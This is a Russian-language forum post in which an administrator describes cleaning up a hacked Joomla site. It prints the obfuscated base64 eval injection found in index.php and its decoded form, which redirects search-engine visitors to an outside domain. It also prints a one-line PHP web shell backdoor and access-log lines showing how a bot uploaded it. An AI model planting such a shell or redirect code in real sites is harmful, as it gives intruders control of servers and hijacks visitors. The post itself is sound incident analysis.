Доброго времени суток всем!Обратился ко мне сегодня один знакомый. Возникла у него проблема с одним из сайтов на жумле, который крутился на VDS. Не открывается - и все тут. Пустая страница. В логах апача - ошибка 500. Никаких подробностей. Начал искать, в чем же трабл. В конфиге PHP отключен вывод ошибок и логи никуда не пишутся. Включил логи в файл. Не помогло. Потом открыл
index.php проблемного сайта - и малость офигел
.
» Спойлер (нажмите, чтобы прочесть) «
Код
<?php eval(base64_decode(& #34;DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6
cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hU
VFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIp
IGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9v
Iikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIi
KSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20i
KW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBv
ciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUi
KSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVy
LCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2go
Ii95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/ c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3Ry
KCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsN
CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwi
KSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcm5kLmprdWIuY29tLyIpOw0KZXhpdCgpOw0KfQp9
Cn0NCn0NCn0="));
Что в переводе на русский значит:
» Спойлер (нажмите, чтобы прочесть) «
Код
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://rnd.jkub.com/");
exit();
}
}
}
}
}
Бэкдор благодаря некоторым ссылкам в гугле был найден достаточно быстро:
» Спойлер (нажмите, чтобы прочесть) «
Код
club# cat /usr/local/www/club/images/post.php
<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>
По времени создания файла был вычислен
хакер:
» Спойлер (нажмите, чтобы прочесть) «
Код
club# cat club.access.log | grep -F "194.44.45.67"
194.44.45.67 - - [19/Oct/2012:17:01:42 +0700] "GET /administrator/index.php HTTP/1.1" 200 5010 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)"
194.44.45.67 - - [19/Oct/2012:17:01:43 +0700] "POST /administrator/index.php HTTP/1.1" 303 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)"
194.44.45.67 - - [19/Oct/2012:17:01:44 +0700] "GET /administrator/index.php HTTP/1.1" 200 25370 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)"
194.44.45.67 - - [19/Oct/2012:17:01:45 +0700] "GET /administrator/index.php?option=com_config&view=component&component=com_media&path=&tmpl=component HTTP/1.1" 200 36771 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)"
194.44.45.67 - - [19/Oct/2012:17:01:46 +0700] "POST /administrator/index.php?option=com_config HTTP/1.1" 303 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)"
194.44.45.67 - - [19/Oct/2012:17:01:47 +0700] "GET /administrator/index.php?option=com_config&view=close&tmpl=component HTTP/1.1" 200 1432 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)"
194.44.45.67 - - [19/Oct/2012:17:01:48 +0700] "GET /administrator/index.php?option=com_media HTTP/1.1" 200 23641 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)"
194.44.45.67 - - [19/Oct/2012:17:01:50 +0700] "POST /administrator/index.php?option=com_media&task=file.upload&tmpl=component&format=html HTTP/1.1" 200 1285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)"
194.44.45.67 - - [19/Oct/2012:17:01:51 +0700] "POST /images/post.php HTTP/1.1" 200 32 "-" "-"
194.44.45.67 - - [19/Oct/2012:23:15:28 +0700] "POST /images/post.php HTTP/1.1" 200 7 "-" "-"
194.44.45.67 - - [19/Oct/2012:23:15:29 +0700] "POST /images/post.php HTTP/1.1" 200 94 "-" "-"
194.44.45.67 - - [19/Oct/2012:23:15:18 +0700] "POST /images/post.php HTTP/1.1" 200 132739 "-" "-"
Действовал явно робот.
Заражены оказались все без исключения PHP-файлы на той же VDS-ке. Надо полагать, тем скриптом на 132 килобайта, который передали через загруженный ранее PHP-файл. Что еще он мог натворить (слить базы, явки, пароли) - остается только догадываться. Однако же логи не затер. Ни ума, ни фантазии в-общем
.
Девочка в реанимации Меры приняты, но возникает вопрос. Это
дырка в компоненте жумлы или у девочки, обслуживающей сайт, на компьютере троян?
Хотя понятно, что компонент дыряв в любом случае, если позволяет заливать PHP-файлы. Но я по логам вижу, что подбора пароля не было - робот сразу ввел правильный. Или логи можно интерпретировать как-то иначе?